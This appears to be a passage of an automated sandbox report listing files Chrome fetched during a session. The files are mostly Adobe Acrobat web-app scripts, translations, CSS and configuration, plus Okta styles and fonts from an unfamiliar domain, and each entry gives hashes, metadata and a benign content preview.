                  MD5:F3728F29C9B4F8DF4A44CBF96CF4FE2D
                  SHA1:79504C7ED6C3E791B4712FCEEA56E3EBA8CA3B67
                  SHA-256:B8BA68439C1C4690C86F131853F97AA1CB71D5A51A9CC04867132BA7F34FFF25
                  SHA-512:E4F4BC01C2F5CD71CD469C98DF61F9392E71E41E9013F3BA9C0681A65AC69E26F64010D5181147B36A2CF4B54E72AE493D4A9A5BF52CB9EFF4775BED0F2377AA
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-home2-dropin/3.52.0_2.1349.0/tools2-chunk.js
                  Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},t=(new e.Error).stack;t&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[t]="da500344-c7b2-4e9b-a510-13ef490b256c",e._sentryDebugIdIdentifier="sentry-dbid-da500344-c7b2-4e9b-a510-13ef490b256c")}catch(e){}}();var _global="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};_global.SENTRY_RELEASE={id:"939110932eed36816ac9d538606bc3479c9c8233"},(self["webpackJsonp-home2"]=self["webpackJsonp-home2"]||[]).push([[5113],{"26Hz":(e,t,o)=>{"use strict";function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(e);t&&(s=s.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),o.push.apply(o,s)}return o}function _defineProperty(e,t,o){return(t=function _toPropertyKey(e){var t=function _toPrimitive(e,t){if("object"!=typeof e||!e)return e;var o=
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (8678), with no line terminators
                  Category:downloaded
                  Size (bytes):8678
                  Entropy (8bit):5.457235762300524
                  Encrypted:false
                  SSDEEP:
                  MD5:E8135F9CB998F11FF6846139C9C806F4
                  SHA1:50D9154E2CE3891BEF41797530CD7495B89D0E0F
                  SHA-256:4686F5F23AAF8DC76C776148FBFFB1E2F0DA9508CA939A76B9D50AF717FC76BD
                  SHA-512:991A4A20C699839A64BA05A68121302586459479F93EE574562BCF0FA35812DD05FC7199DAFEA7D98A10B73DFA2F74D310B2B40841A989BF16C80E672711CAC3
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/4683-c604194f76e2ef7d8e7b.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4683],{78182:function(e,n,t){var a=t(38303);Object.defineProperty(n,"j7",{enumerable:!0,get:function(){return a.AnalyticsActions}}),Object.defineProperty(n,"Cs",{enumerable:!0,get:function(){return a.MessageType}})},38303:function(e,n){Object.defineProperty(n,"__esModule",{value:!0}),n.MessageType=n.AnalyticsActions=void 0,function(e){e.CLONE="clone",e.DEL="del",e.SET="set",e.TRACK="track"}(n.AnalyticsActions||(n.AnalyticsActions={})),function(e){e.ANALYTICS="Analytics"}(n.MessageType||(n.MessageType={}))},48496:function(e,n,t){t.d(n,{Y:function(){return u}});var a=t(93750),r=t(52645),o=t(77671),s=t(71732),i=t(67294),l=t(91792),c=t(17985);t(91829);var d={banner:"alert-banner-styles__banner___1GEzr","info-banner":"alert-banner-styles__info-banner___2IkKv","error-banner":"alert-banner-styles__error-banner___291Lk","neutral-banner":"alert-banner-styles__neutral-banner___2nayQ","success-banner":"alert-banner-styles__succ
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (32058), with no line terminators
                  Category:downloaded
                  Size (bytes):32102
                  Entropy (8bit):4.789329601519955
                  Encrypted:false
                  SSDEEP:
                  MD5:E54BEA065E4CD70FD979A1144A78B7B8
                  SHA1:1D7BDA127213670BFA9C7999DB4ED226FE5DB57B
                  SHA-256:42F8A44128AB694A503DBF9CF294D9603C11E9F5DA27BC20BC82185BF378256B
                  SHA-512:A0842D7A5F73845AB7F600976B18934E9E1EBB281670AF46C813F8CB175A7660ECB435452013C5BFE04F12A22F8456BFD17C3707AF527FB783A5ECCE671FFD57
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-global-nav-dropin/3.58.0_3.586.0/translations-en-US-json-chunk.js
                  Preview:"use strict";(self["webpackJsonp-global-nav"]=self["webpackJsonp-global-nav"]||[]).push([[818],{t39f:e=>{e.exports=JSON.parse('{"global_nav.default_branding_ui2":"Adobe Acrobat","global_nav.default_branding_ui2_aria_label":"Adobe Acrobat Logo - Home","help_menu.get_help":"Get help","help_menu.hands_on_tutorial":"Hands-on tutorial","help_menu.share_feedback":"Share feedback","help_menu.restart_tour":"Restart tour","help_menu.about_document_cloud":"Legal notices","help_menu.post_suggestion_message_placeholder":"How can we improve this product experience?","help_menu.post_suggestion_title":"Share in our feedback forum","help_menu.uv_legal":"Your feedback will be collected via UserVoice, a trusted partner service not operated by Adobe.","help_menu.uv_learn_more":"Learn more.","profile_menu.settings":"Settings","profile_menu.my_plan":"My plan","profile_menu.see_plans":"See plans","profile_menu.invite_team_members":"Assign user licenses ({unassignedLicenses} unassigned)","profile_menu.buy_mo
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:downloaded
                  Size (bytes):134
                  Entropy (8bit):4.596346617979037
                  Encrypted:false
                  SSDEEP:
                  MD5:E78AAE29253C4894EF77C2263DF2AF0E
                  SHA1:F4BB400456EB30EB1D131549B777F405CCC1D348
                  SHA-256:599A201A8BCF34F862C99ED2109D9DAB8083C751FA16AA2EE87382FDAC0E1042
                  SHA-512:E4BA14CBBC16AF7E9897557DE666A9EFBFCCA8E066F1AF66D2FD583743DEBE68D9BF8A2500CD02EC7D58B1CDD0EF92EEBD20E6ACC7D1D56E29A49A755913717F
                  Malicious:false
                  Reputation:unknown
                  URL:https://client.messaging.adobe.com/2.62.1/initConfig.json
                  Preview:{"serverUrl": "https://server.messaging.adobe.com", "wsUrl": "https://server.messaging.adobe.com", "callAfterUpdateAccessToken": true}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):174801
                  Entropy (8bit):5.490406707271644
                  Encrypted:false
                  SSDEEP:
                  MD5:1F58287BEE8BFF620F2FF25983463C29
                  SHA1:71B83869ACA42180E1D039D871E1E13E2A49D50F
                  SHA-256:6841CD2CEF8CEEFEC1AE1CCBBF0F362B11F84DBE1A1BEC49988EAD8453165B89
                  SHA-512:0012993A5CE34EE8C4DFEE35A6630DB87D4DBD08F2287CE3E758595BC2CD3F490B8E244419787E282F60B6246E1129ED905262639498BC231B42437386EB8818
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-fillsign2-dropin/3.17.1_1.498.0/fs2QTverbs0-chunk.js
                  Preview:(self["webpackJsonp-fillsign2"]=self["webpackJsonp-fillsign2"]||[]).push([[2533],{"+ERq":(e,t,r)=>{"use strict";var n=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("YWiy"));t.A=function(e){var t=e.fill,r=void 0===t?"currentColor":t,a=e.width,i=void 0===a?24:a,s=e.height,l=void 0===s?24:s,c=e.style,u=void 0===c?{}:c,p=function _objectWithoutProperties(e,t){var r={};for(var n in e)t.indexOf(n)>=0||Object.prototype.hasOwnProperty.call(e,n)&&(r[n]=e[n]);return r}(e,["fill","width","height","style"]);return o.default.createElement("svg",n({viewBox:"0 0 24 24",style:n({fill:r,width:i,height:l},u)},p),o.default.createElement("path",{d:"M21,7L9,19L3.5,13.5L4.91,12.09L9,16.17L19.59,5.59L21,7Z"}))}},Di0q:(e,t,r)=>{"use strict";var n=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=argum
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:SVG Scalable Vector Graphics image
                  Category:downloaded
                  Size (bytes):270
                  Entropy (8bit):4.840496990713235
                  Encrypted:false
                  SSDEEP:
                  MD5:40EB39126300B56BF66C20EE75B54093
                  SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                  SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                  SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/efK0nbKYrgITt7HboQawuvNUwvTpu5YRmtWQ6z678141
                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (477)
                  Category:downloaded
                  Size (bytes):12968
                  Entropy (8bit):5.562980869089098
                  Encrypted:false
                  SSDEEP:
                  MD5:428605C51091894E590925ADE28A70A8
                  SHA1:1603085E3F5C77E23CC55E47E112E79C32705DCC
                  SHA-256:EE3DB74ECB596B69FE4A5AB47DDFD834BB0C9DDF04271109105039FD88A497C4
                  SHA-512:A3AD0D0E98702C0FEA0F4266ADF14CED422444798003CF725634D8CB8D0C6BA9DE5D5157866B214BE7766A3144ED09389F40214BC50A2E531F3ADCFF63E0DB7A
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/home/offline.html
                  Preview:<!DOCTYPE html>. Copyright (c).2020 Adobe Systems Incorporated. All rights reserved. -->. offline.html -->.<html>.<head>.<style>.body {. background-color: #fff;. color: #333;. font-family: adobe-clean, Helvetica, Arial, sans-serif;. font-size: 16px;. margin: 0;. text-align: center;.}...content {. align-items: center;. display: flex;. height: 100vh;. justify-content: center;.}..h1 {. color: #2c2c2c;. font-size: 28px;. font-weight: lighter;. margin: auto;. margin-top: 16px;.}..@media (min-width: 375px) {. h1 {. margin-top: 32px;. }.}..#service-msg {. color: #707070;. font-size: 14px;. font-style: italic;. margin-top: 12px;.}..#lang-picker {. font-size: 12px;. margin: auto;. margin-top: 72px;.}...lang-choice {. color: #747474;. cursor: pointer;. display: inline-block;. padding: 6px;. text-decoration: none;.}...lang-choice.selected {. color: #323232;.}...lang-choice.selected:hover {.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                  Category:downloaded
                  Size (bytes):36696
                  Entropy (8bit):7.988666025644622
                  Encrypted:false
                  SSDEEP:
                  MD5:A69E9AB8AFDD7486EC0749C551051FF2
                  SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                  SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                  SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/GDSherpa-regular.woff
                  Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:dropped
                  Size (bytes):92
                  Entropy (8bit):4.5649306741469164
                  Encrypted:false
                  SSDEEP:
                  MD5:1FABB82EF644B3470425DFD3167532E8
                  SHA1:3EBFBEA88288DF36010F5F844D2C54A91500597F
                  SHA-256:D210F85CADBADBD89EE845F2BB81220CA313F2B402E7973604E2EA7B546E82F8
                  SHA-512:FC5A0825828D960CF317F3F5C6C64E0900BA055618FE68C96633E05C081432D6EA6A96DD7F17EC61BEF547013E1B0E0B8E2E274B6C11EF8A131E178A075F03B7
                  Malicious:false
                  Reputation:unknown
                  Preview:{"title":"ErrMissingAPIKey","status":403,"error_code":403000,"message":"API key is missing"}
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):1121271
                  Entropy (8bit):4.965976380992454
                  Encrypted:false
                  SSDEEP:
                  MD5:10736F28F474DFF46B455FEEA0437A4C
                  SHA1:5EE7C6855465090FC382185082C671C4D34D76D4
                  SHA-256:423E260F412BBE4B6E790FDACF07B19D94D6F3256F46A9C505DC427E51095512
                  SHA-512:7A85265065F1E575C07843E41ADA77CE5AB09E36538B9292EEE77AB37C163B9520CB74C8372FCED20467472163C3FF84E578BD58578C4181D370EC5FCA90897B
                  Malicious:false
                  Reputation:unknown
                  URL:https://commerce.adobe.com/mini-apps/_next/static/chunks/pages/_app.77e62ae4.css
                  Preview:/*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,footer,header,nav,section{display:block}h1{font-size:2em;margin:.67em 0}figcaption,figure,main{display:block}figure{margin:1em 40px}hr{box-sizing:content-box;height:0;overflow:visible}pre{font-family:monospace,monospace;font-size:1em}a{background-color:transparent;-webkit-text-decoration-skip:objects}abbr[title]{border-bottom:none;text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted}b,strong{font-weight:inherit;font-weight:bolder}code,kbd,samp{font-family:monospace,monospace;font-size:1em}dfn{font-style:italic}mark{background-color:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sub{bottom:-.25em}sup{top:-.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (48135)
                  Category:downloaded
                  Size (bytes):48190
                  Entropy (8bit):5.398013925479974
                  Encrypted:false
                  SSDEEP:
                  MD5:35EFE12BC02CA61F885F1DA1312E1EB7
                  SHA1:CB8A36241708983BDE37CAC5CE4E630136A751F3
                  SHA-256:9D9C9C69E40BC30CE172151AFE09555016704BB89665117E1409C7B93DB89C65
                  SHA-512:D2201CBC8C9336296F9500BFC25328A37C783CA8801D59D0549F692BD8C7F63199C47101B8C413C078CE7302BB90EEE4691125F62E758BBEB00627ABBEADAB71
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-send-dropin/3.22.1_6.304.0/sendProvider-chunk.js
                  Preview:(self["webpackJsonp-send"]=self["webpackJsonp-send"]||[]).push([[658],{HwaR:(e,t,r)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0});var n=function(){function defineProperties(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n.key,n)}}return function(e,t,r){return t&&defineProperties(e.prototype,t),r&&defineProperties(e,r),e}}(),o=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}}(r("JmJ7")),s=r("Gcvr");var a=function(){function Client(){!function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,Client),this._imsData=null,this._environment="stage",this._apiKey=null,this._assetData=null,this._tags={}}return n(Client,[{key:"configure",value:function configure(e){var t=e.apiKey,r=e.assetData,n=e.environment,o=e.imsData,a=e.tags,i=e.token;return o&&(this._imsData=o),n&&(this.setEnvironment(n),this._endpo
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (61460), with no line terminators
                  Category:downloaded
                  Size (bytes):61568
                  Entropy (8bit):4.842772888971216
                  Encrypted:false
                  SSDEEP:
                  MD5:AA477C20F8F75EE7AC20876743283E7B
                  SHA1:250D3B7CC047F571AE8CE45AFD7649C71427AB2E
                  SHA-256:5244242689A01A89F871A8D4FB066782D0CB03A4C94B29FD90761EA65544D7D9
                  SHA-512:23193262A3D79B6659E19B8A4E7288A69A8F60D5CCB1EAF657B0ED467EF141623A289585F197A9B0EF3E53E82551DA69BE662DC130C4716905C31DE5D4103F4F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-marketing/3.67.0_2.863.0/translations-en-US-json-chunk.js
                  Preview:"use strict";(self["webpackJsonp-marketing"]=self["webpackJsonp-marketing"]||[]).push([[818],{t39f:e=>{e.exports=JSON.parse('{"err.not.entitiled":"You are not entitled to this feature. Please contact your admin.","appcenter.under.construction":"Under Construction...","appcenter.generic.error":"We are having trouble rendering this page. Please check back later.","appcenter.user.not.allowed.for.individual.purchase":"Please contact your admin to enable this feature.","appcenter.feature.not.available":"This is a restricted feature. Please check with your administrator.","apps.label":"Apps","button.name.purchase":"Purchase","button.name.upgrade":"Upgrade","button.name.subscribe":"Subscribe","button.name.sys.req":"System Requirements","button.name.download":"Download","button.name.cancel":"Cancel","button.name.learn.more":"Learn More","label.name.desktop.apps":"Desktop apps","label.name.mobile.apps":"Mobile apps","appcenter.header.line1":"Do more with Adobe Document Cloud","appcenter.header.
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1173)
                  Category:downloaded
                  Size (bytes):1213
                  Entropy (8bit):5.177643348101637
                  Encrypted:false
                  SSDEEP:
                  MD5:8ED7F83FCEF2ACA74F07871A4C14F22A
                  SHA1:C5B0B21615C6647162E9F4BF24C2859C675EE796
                  SHA-256:8BF41BC3EA7DE1743DDB01DC9C00CCC86F33479F6F2AE3FE93139B4678913BE9
                  SHA-512:2EC3FC90BF2AA24E5D6916FBD433E36515788F651D52C97F3E20925FD231A0937944B270ED5730DAC5626A2A4867F4D40E0BA6E52C5ADDEABCFFE450B9F06100
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-web-app-dropin/3.71.0_2.210.0/611.js
                  Preview:"use strict";(self["webpackJsonp-web-app"]=self["webpackJsonp-web-app"]||[]).push([[611],{xnjt:(e,t,s)=>{s.r(t),s.d(t,{default:()=>c});var n=s("YWiy"),r=s("/hLX"),o=s.n(r),i=s("plsW"),a=s("QyAB");function _extends(){return _extends=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var s=arguments[t];for(var n in s)Object.prototype.hasOwnProperty.call(s,n)&&(e[n]=s[n])}return e},_extends.apply(this,arguments)}const p=i.logging.getLogger("LoadDropinContainer"),c=(d=a.Z,(l=class extends n.Component{constructor(e){super(e),this.loadDropinAsNeeded=async()=>{const{dropinCls:e}=this.state;if(e)return;const{location:t}=this.props;if(!t)return;const s=i.router.getQueryParams(t.search),n=Object.entries(s).find((e=>{let[t,s]=e;return"load!dropin"===t?s:void 0}));if(n)try{const e=await i.discovery.loadDropinClass(n[1]);this.setState({dropinCls:e})}catch(e){p.error(e.stack||e.message)}},this.state={dropinCls:null}}componentDidMount(){this.loadDropinAsNeeded()}render
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                  Category:downloaded
                  Size (bytes):28584
                  Entropy (8bit):7.992563951996154
                  Encrypted:true
                  SSDEEP:
                  MD5:17081510F3A6F2F619EC8C6F244523C7
                  SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                  SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                  SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                  Malicious:false
                  Reputation:unknown
                  URL:https://4fsv.iatrivvbe.com/GDSherpa-regular.woff2
                  Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:downloaded
                  Size (bytes):19973
                  Entropy (8bit):4.7881850390939595
                  Encrypted:false
                  SSDEEP:
                  MD5:FE36CEC1DEEFA0E9AA223399BD443CE5
                  SHA1:B7DD0108DCA3135635BE908A967C1CB5F0CC127E
                  SHA-256:C17787A1E59757305C6A3012182003F39CEE6DB221001305144BE6823591C194
                  SHA-512:849FCF99695DA6268DE62E4BB63C1D9225E54E4FD65754D33854ED514C0D40995D52A3010E61C377F64CD2ADDC48E842F70E5CE9F28AA711260E5A9FFE27F25C
                  Malicious:false
                  Reputation:unknown
                  URL:https://dcdiscovery.adobe.io/index
                  Preview:{"expiry":1743073864,"services":{"gen_ai_editor_service":{"resources":{"operations":{"predict":{"http_method":"POST","uri":"{+base_uri}/services/v2/predict","authentication":["auth_header_primary"],"accept":{"updated_text":{"application_ndjson_v1":"application/x-ndjson","application_json_v1":"application/json"}},"resource_parameter":{"name":"base_uri","default":"https://senseicore.adobe.io","type":"string","required":true},"form_data_parameters":[{"name":"service_id","default":"sensei:Feature:autocrop:Service-392ebc4b9147491da34c3694b04f52a8","type":"string","required":true}]},"predict_cancel":{"http_method":"POST","uri":"{+base_uri}/services/v2/cancel/{+request_id}","authentication":["auth_header_primary"],"resource_parameter":{"default":"https://senseicore.adobe.io","name":"base_uri","type":"string","required":true},"uri_parameters":[{"name":"request_id","type":"string"}],"accept":{"application_json_v1":"application/json"}}}}},"generate_thought_partner":{"resources":{"operations":{"p
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3174)
                  Category:downloaded
                  Size (bytes):3214
                  Entropy (8bit):4.7827512382836534
                  Encrypted:false
                  SSDEEP:
                  MD5:1019FC4F24519EF763252F88AC312FF6
                  SHA1:30A218C2935A3B2FFA138F7284B3B7C7BDB3A461
                  SHA-256:56F0A6BA40EE444418CEDB236C7D289BA331E66691978F0E6FB4EB67318ED2FB
                  SHA-512:3D16EF6A6DCF2A6F6AB0B8DA7EDB044791ADA7674738C5B0E5D109598F54B7E82F2BAD174DD4C654021D0C44495517075B9CB7F44E5A00D700A0A5010125DE5F
                  Malicious:false
                  Reputation:unknown
                  URL:https://acrobat.adobe.com/dc-conversions2-dropin/3.17.1_2.146.0/910.js
                  Preview:(self["webpackJsonp-conversions2"]=self["webpackJsonp-conversions2"]||[]).push([[910],{"4xTT":(a,e,t)=>{var c=t("YWiy");function SExportpdf36(a){return c.createElement("svg",a,[c.createElement("path",{d:"M19.36,31H5a2,2,0,0,1-2-2V3A2,2,0,0,1,5,1H20.38a1.5,1.5,0,0,1,1.06.44l5.12,5.1A1.5,1.5,0,0,1,27,7.6v12a8.261,8.261,0,0,1,1-.06V7.6a2.52,2.52,0,0,0-.74-1.77L22.14.73A2.47,2.47,0,0,0,20.38,0H5A3,3,0,0,0,2,3V29a3,3,0,0,0,3,3H19.71a8.44087,8.44087,0,0,1-.35-1Z",fill:"var(--iconSeafoam, #16878c)",key:0}),c.createElement("path",{d:"M19,28.54a9,9,0,0,1,8-8.94V7.6a1.5,1.5,0,0,0-.44-1.06l-5.12-5.1A1.5,1.5,0,0,0,20.38,1H5A2,2,0,0,0,3,3V29a2,2,0,0,0,2,2H19.36A8.94018,8.94018,0,0,1,19,28.54Z",fill:"var(--iconSeafoam, #16878c)",opacity:"0.1",style:{isolation:"isolate"},key:1}),c.createElement("path",{d:"M8.5,22H21.82809l-.92292,1H8.5a.5.5,0,0,1,0-1Z",fill:"var(--iconSeafoam, #16878c)",key:2}),c.createElement("path",{d:"M8.5,25H19.71889l-.35741,1H8.5a.5.5,0,0,1,0-1Z",fill:"var(--iconSeafoam, #16878c
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:JSON data
                  Category:downloaded
                  Size (bytes):7436
                  Entropy (8bit):4.782472228407852
                  Encrypted:false
                  SSDEEP:
                  MD5:65C6215DE16BEF30D5401B92C93BFC47
                  SHA1:2080D49568E18633DFACEEC1D68EA5611F713FC9
                  SHA-256:9DAC50E9616FB945FA83CC52870BCD9F4B731AC980DD052078FA133DF2468272
                  SHA-512:2E4272BEAC664E7E8569BFE77A7054864BC75153689244245095E7207E8CD8F4DC332C815D91F33AA8E46B048A0543068053F79B662788873010092EDC4F1AF3
                  Malicious:false
                  Reputation:unknown
                  URL:https://p13n.adobe.io/fg/api/v3/feature?clientId=dc-prod-virgoweb&meta=false
                  Preview:{"analyticsVersion":"2.0","api_version":"0.1","json_version":"0.1","ttl":60,"caching_enabled":false,"client_analytics_params":{"app_id":44,"safe_event_required":false,"analytics_required":false},"releases":[{"bit_index":450,"release_name":"dc-share-frictionless-panel","features":["dc-share-frictionless-wordtopdf-panel"],"release_analytics_params":[{"app_id":44,"release_id":290,"bit_index":450,"variant_id":10001788,"feature_id":-1,"analytics_required":true,"event_id":"0dd0dbb1-8390-4358-ab54-b07cf5d3e061"}]},{"bit_index":1272,"release_name":"dc-fs2-sign-label","features":["fs2-sign-label-esign"],"release_analytics_params":[{"app_id":44,"release_id":1112,"bit_index":1272,"variant_id":10010463,"feature_id":-1,"analytics_required":true,"event_id":"2b16dd04-280b-4c7e-aa60-a7f0f0274b13"}]},{"bit_index":1770,"release_name":"dc-web-ftes-on","features":["dc-web-ftes-2"],"release_analytics_params":[{"app_id":44,"release_id":1610,"bit_index":1770,"variant_id":10015615,"feature_id":10671,"f_key":"
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (51734)
                  Category:downloaded
                  Size (bytes):222931
                  Entropy (8bit):5.0213311632628725
                  Encrypted:false
                  SSDEEP:
                  MD5:0329C939FCA7C78756B94FBCD95E322B
                  SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                  SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                  SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                  Malicious:false
                  Reputation:unknown
                  URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                  Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (65467)
                  Category:downloaded
                  Size (bytes):306365
                  Entropy (8bit):5.3403256061896744
                  Encrypted:false
                  SSDEEP:
